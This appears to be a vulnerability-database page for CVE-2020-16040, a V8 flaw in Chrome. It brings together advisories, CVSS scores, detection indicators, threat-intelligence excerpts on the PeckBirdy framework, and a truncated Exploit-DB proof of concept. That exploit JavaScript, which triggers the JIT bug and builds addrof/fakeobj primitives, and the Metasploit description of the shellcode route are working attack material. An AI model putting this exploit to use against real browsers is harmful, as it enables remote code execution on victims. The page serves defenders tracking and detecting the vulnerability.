CVE-2020-16040
published 2021-01-08CVE-2020-16040: Insufficient data validation in V8 in Google Chrome prior to 87.0.4280.88 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML…
PriorityP279medium6.5CVSS 3.1
AVNACLPRNUIRSUCNINAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
99.59%
99.9th percentile
Insufficient data validation in V8 in Google Chrome prior to 87.0.4280.88 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
Affected
8 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| chromium | chromium | >= 0 < 87.0.4280.88-0.1 | 87.0.4280.88-0.1 |
| chromium | chromium | >= 0 < 87.0.4280.88-0.1 | 87.0.4280.88-0.1 |
| chromium | chromium | >= 0 < 87.0.4280.88-0.1 | 87.0.4280.88-0.1 |
| chromium | chromium | >= 0 < 87.0.4280.88-0.1 | 87.0.4280.88-0.1 |
| debian | chromium | < chromium 87.0.4280.88-0.1 (bookworm) | chromium 87.0.4280.88-0.1 (bookworm) |
| chrome | < 87.0.4280.88 | 87.0.4280.88 | |
| chrome | >= unspecified < 87.0.4280.88 | 87.0.4280.88 | |
| chrome_chrome | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →CVE-2020-16040 exploitation script delivered via PeckBirdy C&C framework targeting Google Chrome browsers; look for watering-hole injections on gambling and government websites that load remote JScript payloads. ↗
- →CVE-2020-16040 is an integer overflow in V8's SimplifiedLowering/TurboFan phase; exploit uses ArrayPrototypeShift to create a JSArray with length -1, then achieves arbitrary read/write via ArrayBuffer and executes shellcode via WebAssembly RWX page. ↗
- →PeckBirdy victim tracking: monitor for creation of a file named ___unique_id___ in the Windows %TEMP% folder, which is used to persist the victim ID across executions. ↗
- →PeckBirdy uses cookie prefix Hm_lvt_ (mimicking a legitimate analytics service) to store victim IDs in browser cookies; detect anomalous Hm_lvt_ cookies set by non-legitimate analytics domains. ↗
- →PeckBirdy delivers fake Chrome update social engineering pages to victims; monitor for browser processes spawning unexpected child processes after visiting gambling or government sites. ↗
- →CVE-2020-16040 exploit requires --no-sandbox Chrome flag to execute payload outside the renderer sandbox; alert on Chrome launched with --no-sandbox in enterprise environments. ↗
- ·CVE-2020-16040 affects Google Chrome versions prior to 87.0.4280.88 (64-bit); the exploit is only reliably weaponized against that specific version range. ↗
- ·PeckBirdy falls back to Adobe Flash ActiveX TCP socket communication for older environments; this fallback path is only relevant for legacy systems where Flash was not removed. ↗
CVSS provenance
nvdv3.16.5MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:N/A:P
osv6.5MEDIUM
vulncheck6.5MEDIUM
vendor_debian6.5MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Chrome
Stable Channel Update for Desktop: CVE-2020-16040
vendor_chrome·2020-12-02·CVSS 6.5
CVE-2020-16040 [HIGH] Stable Channel Update for Desktop: CVE-2020-16040
Stable Channel Update for Desktop
CVE-2020-16040: Insufficient data validation in V8. Reported by Lucas Pinheiro, Microsoft Browser Vulnerability Research on 2020-11-19 [$TBD][ 1151865 ] Medium CVE-2020-16041: Out of bounds read in networking
Reported by Sergei Glazunov and Mark Brand of Google Project Zero on 2020-11-23 [$TBD][ 1151890 ] Medium CVE-2020-16042: Uninitialized Use in V8
Severity: high
Debian
CVE-2020-16040: chromium - Insufficient data validation in V8 in Google Chrome prior to 87.0.4280.88 allowe...
vendor_debian·2020·CVSS 6.5
CVE-2020-16040 [MEDIUM] CVE-2020-16040: chromium - Insufficient data validation in V8 in Google Chrome prior to 87.0.4280.88 allowe...
Insufficient data validation in V8 in Google Chrome prior to 87.0.4280.88 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
Scope: local
bookworm: resolved (fixed in 87.0.4280.88-0.1)
bullseye: resolved (fixed in 87.0.4280.88-0.1)
forky: resolved (fixed in 87.0.4280.88-0.1)
sid: resolved (fixed in 87.0.4280.88-0.1)
trixie: resolved (fixed in 87.0.4280.88-0.1)
GHSA
GHSA-6v42-384q-wwf5: Insufficient data validation in V8 in Google Chrome prior to 87
ghsa_unreviewed·2022-05-24
CVE-2020-16040 [MEDIUM] CWE-787 GHSA-6v42-384q-wwf5: Insufficient data validation in V8 in Google Chrome prior to 87
Insufficient data validation in V8 in Google Chrome prior to 87.0.4280.88 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
OSV
CVE-2020-16040: Insufficient data validation in V8 in Google Chrome prior to 87
osv·2021-01-08·CVSS 6.5
CVE-2020-16040 [MEDIUM] CVE-2020-16040: Insufficient data validation in V8 in Google Chrome prior to 87
Insufficient data validation in V8 in Google Chrome prior to 87.0.4280.88 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
VulnCheck
Google Chrome Improper Input Validation
vulncheck·2020·CVSS 6.5
CVE-2020-16040 [MEDIUM] Google Chrome Improper Input Validation
Google Chrome Improper Input Validation
Insufficient data validation in V8 in Google Chrome prior to 87.0.4280.88 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
Affected: Google Chrome
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.trendmicro.com/en_us/research/26/a/peckbirdy-script-framework.html
Exploit PoC: https://vulncheck.com/xdb/6d063e87a639
Project0
Project Zero RCA: CVE-2021-0920: Android sk_buff use-after-free in Linux
project_zero·CVSS 6.4
CVE-2021-0920 [MEDIUM] Project Zero RCA: CVE-2021-0920: Android sk_buff use-after-free in Linux
# CVE-2021-0920: Android sk_buff use-after-free in Linux
*Xingyu Jin, Android Security Research*
## The Basics
**Disclosure or Patch Date:** November 5, 2021
**Product:**Google Android
**Advisory:** https://source.android.com/security/bulletin/2021-11-01#kernel-components
**Affected Versions:** Pre-Nov 5 2021 SPL for devices released prior to Nov 2022
**First Patched Version:** 5 Nov 2021 SPL+
**Issue/Bug Report:** A-196926917
**Patch CL:** https://android.googlesource.com/kernel/common/+/cbcf01128d0a92e131bd09f1688fe032480b65ca
**Bug-Introducing CL:** Unknown
**Reporter(s):** Anonymous
## The Code
**Proof-of-concept:** See the appendix
**Exploit sample:** N/A
**Did you have access to the exploit sample when doing the analysis?** Yes
## The Vulnerability
**Bug class:** use-
No detection rules found.
Exploit-DB
Google Chrome 86.0.4240 V8 - Remote Code Execution
exploitdb·2021-04-06·CVSS 6.5
CVE-2020-16040 [MEDIUM] Google Chrome 86.0.4240 V8 - Remote Code Execution
Google Chrome 86.0.4240 V8 - Remote Code Execution
---
# Exploit Title: Google Chrome 86.0.4240 V8 - Remote Code Execution
# Exploit Author: r4j0x00
# Version: > 32n);
return f64_buf[0];
}
function foo(a) {
var y = 0x7fffffff;
if (a == NaN) y = NaN;
if (a) y = -1;
let z = y + 1;
z >>= 31;
z = 0x80000000 - Math.sign(z|1);
if(a) z = 0;
var arr = new Array(0-Math.sign(z));
arr.shift();
var cor = [1.1, 1.2, 1.3];
return [arr, cor];
}
for(var i=0;i<0x3000;++i)
foo(true);
var x = foo(false);
var arr = x[0];
var cor = x[1];
const idx = 6;
arr[idx+10] = 0x4242;
function addrof(k) {
arr[idx+1] = k;
return ftoi(cor[0]) & 0xffffffffn;
}
function fakeobj(k) {
cor[0] = itof(k);
return arr[idx+1];
}
var float_array_map = ftoi(cor[3]);
var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
var
Metasploit
Google Chrome versions before 87.0.4280.88 integer overflow during SimplfiedLowering phase
metasploit
Google Chrome versions before 87.0.4280.88 integer overflow during SimplfiedLowering phase
Google Chrome versions before 87.0.4280.88 integer overflow during SimplfiedLowering phase
This module exploits an issue in Google Chrome versions before 87.0.4280.88 (64 bit). The exploit makes use of an integer overflow in the SimplifiedLowering phase in turbofan. It is used along with a type hardening bypass using ArrayPrototypeShift to create a JSArray with a length of -1. This is abused to gain arbitrary read/write into the isolate region. Then an ArrayBuffer can be used to achieve absolute arbitrary read/write. The exploit then uses WebAssembly in order to allocate a region of RWX memory, which is then replaced with the payload shellcode. The payload is executed within the sandboxed renderer process, the browser must be run with the --no-sandbox option for the payload to work correc
Trendmicro
PeckBirdy: A Versatile Script Framework for LOLBins Exploitation Used by China-aligned Threat Groups
blogs_trendmicro·2026-01-26·CVSS 6.5
[MEDIUM] PeckBirdy: A Versatile Script Framework for LOLBins Exploitation Used by China-aligned Threat Groups
APT & Targeted Attacks
# PeckBirdy: A Versatile Script Framework for LOLBins Exploitation Used by China-aligned Threat Groups
PeckBirdy is a sophisticated JScript-based C&C framework used by China-aligned APT groups to exploit LOLBins across multiple environments, delivering advanced backdoors to target gambling industries and Asian government entities.
By: Ted Lee, Joseph C Chen
2026/01/26
Read time: ( words)
Save to Folio
# Key takeaways
- PeckBirdy is a JScript-based command-and-control (C&C) framework used by China-aligned APT actors since 2023, designed to execute across multiple environments, enabling flexible deployment.
- Two modular backdoors, HOLODONUT and MKDOOR, extend PeckBirdy’s attack capabilities beyond its core functionality.
- Meanwhile, the SHADOW-VOID-044 and SHA
Trendmicro
PeckBirdy: A Versatile Script Framework for LOLBins Exploitation Used by China-aligned Threat Groups
blogs_trendmicro·2026-01-26
PeckBirdy: A Versatile Script Framework for LOLBins Exploitation Used by China-aligned Threat Groups
APT & Targeted Attacks
## PeckBirdy: A Versatile Script Framework for LOLBins Exploitation Used by China-aligned Threat Groups
PeckBirdy is a sophisticated JScript-based C&C framework used by China-aligned APT groups to exploit LOLBins across multiple environments, delivering advanced backdoors to target gambling industries and Asian government entities.
By: Ted Lee, Joseph C Chen Jan 26, 2026 Read time: ( words)
Save to Folio
https://{domain}/{ATTACK_ID}
Downloads the main PeckBirdy script
https://{domain}/{ATTACK_ID}/hta
Downloads the landing script for MSHTA
https://{domain}/{ATTACK_ID}/html
Downloads the landing script for MTML
https://{domain}/{ATTACK_ID}/wscript
Downloads the landing script for WScript
Table 1. The PeckBirdy server APIs to obtain landing scripts
Dependi
Trendmicro
PeckBirdy: A Versatile Script Framework for LOLBins Exploitation Used by China-aligned Threat Groups
blogs_trendmicro·2026-01-26
PeckBirdy: A Versatile Script Framework for LOLBins Exploitation Used by China-aligned Threat Groups
APT & Targeted Attacks
## PeckBirdy: A Versatile Script Framework for LOLBins Exploitation Used by China-aligned Threat Groups
PeckBirdy is a sophisticated JScript-based C&C framework used by China-aligned APT groups to exploit LOLBins across multiple environments, delivering advanced backdoors to target gambling industries and Asian government entities.
By: Ted Lee, Joseph C Chen Jan 26, 2026 Read time: ( words)
Save to Folio
https://{domain}/{ATTACK_ID}
Downloads the main PeckBirdy script
https://{domain}/{ATTACK_ID}/hta
Downloads the landing script for MSHTA
https://{domain}/{ATTACK_ID}/html
Downloads the landing script for MTML
https://{domain}/{ATTACK_ID}/wscript
Downloads the landing script for WScript
Table 1. The PeckBirdy server APIs to obtain landing scripts
Dependi
Trendmicro
PeckBirdy: A Versatile Script Framework for LOLBins Exploitation Used by China-aligned Threat Groups
blogs_trendmicro·2026-01-26
PeckBirdy: A Versatile Script Framework for LOLBins Exploitation Used by China-aligned Threat Groups
APT & Targeted Attacks
## PeckBirdy: A Versatile Script Framework for LOLBins Exploitation Used by China-aligned Threat Groups
PeckBirdy is a sophisticated JScript-based C&C framework used by China-aligned APT groups to exploit LOLBins across multiple environments, delivering advanced backdoors to target gambling industries and Asian government entities.
By: Ted Lee, Joseph C Chen 2026/01/26 Read time: ( words)
Save to Folio
https://{domain}/{ATTACK_ID}
Downloads the main PeckBirdy script
https://{domain}/{ATTACK_ID}/hta
Downloads the landing script for MSHTA
https://{domain}/{ATTACK_ID}/html
Downloads the landing script for MTML
https://{domain}/{ATTACK_ID}/wscript
Downloads the landing script for WScript
Table 1. The PeckBirdy server APIs to obtain landing scripts
Depending
Trendmicro
PeckBirdy: A Versatile Script Framework for LOLBins Exploitation Used by China-aligned Threat Groups
blogs_trendmicro·2026-01-26
PeckBirdy: A Versatile Script Framework for LOLBins Exploitation Used by China-aligned Threat Groups
APT y ataques dirigidos
## PeckBirdy: A Versatile Script Framework for LOLBins Exploitation Used by China-aligned Threat Groups
PeckBirdy is a sophisticated JScript-based C&C framework used by China-aligned APT groups to exploit LOLBins across multiple environments, delivering advanced backdoors to target gambling industries and Asian government entities.
By: Ted Lee, Joseph C Chen Jan 26, 2026 Read time: ( words)
Save to Folio
https://{domain}/{ATTACK_ID}
Downloads the main PeckBirdy script
https://{domain}/{ATTACK_ID}/hta
Downloads the landing script for MSHTA
https://{domain}/{ATTACK_ID}/html
Downloads the landing script for MTML
https://{domain}/{ATTACK_ID}/wscript
Downloads the landing script for WScript
Table 1. The PeckBirdy server APIs to obtain landing scripts
Depend
HackerOne
Steam Deck Single Click Root Remote Code Execution
hackerone·2023-08-01·CVSS 6.5
[MEDIUM] Steam Deck Single Click Root Remote Code Execution
Steam Deck Single Click Root Remote Code Execution
The version of Chromium Embedded Framework included in the Linux client was susceptible to a v8 exploit that allowed modification of local files. The researcher demonstrated chaining local file modification to a local privilege escalation.
The Steam Deck on latest software is vulnerable to a Remote Code Execution (RCE) vulnerability which can be chained with a privilege escalation vulnerability to provide an attacker full arbitrary root execution access after a user clicks on a link to maliciously crafted webpage in a Steam Chat message. The entire exploit chain can run deterministically after that single click with no further user interaction.
Specifically, the Chromium Embedded Framework (CEF) used in the steamwebhelper is based on C
http://packetstormsecurity.com/files/162087/Google-Chrome-86.0.4240-V8-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/162106/Google-Chrome-86.0.4240-V8-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/162144/Google-Chrome-SimplfiedLowering-Integer-Overflow.htmlhttps://chromereleases.googleblog.com/2020/12/stable-channel-update-for-desktop.htmlhttps://crbug.com/1150649http://packetstormsecurity.com/files/162087/Google-Chrome-86.0.4240-V8-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/162106/Google-Chrome-86.0.4240-V8-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/162144/Google-Chrome-SimplfiedLowering-Integer-Overflow.htmlhttps://chromereleases.googleblog.com/2020/12/stable-channel-update-for-desktop.htmlhttps://crbug.com/1150649
2021-01-08
Published
Exploited in the wild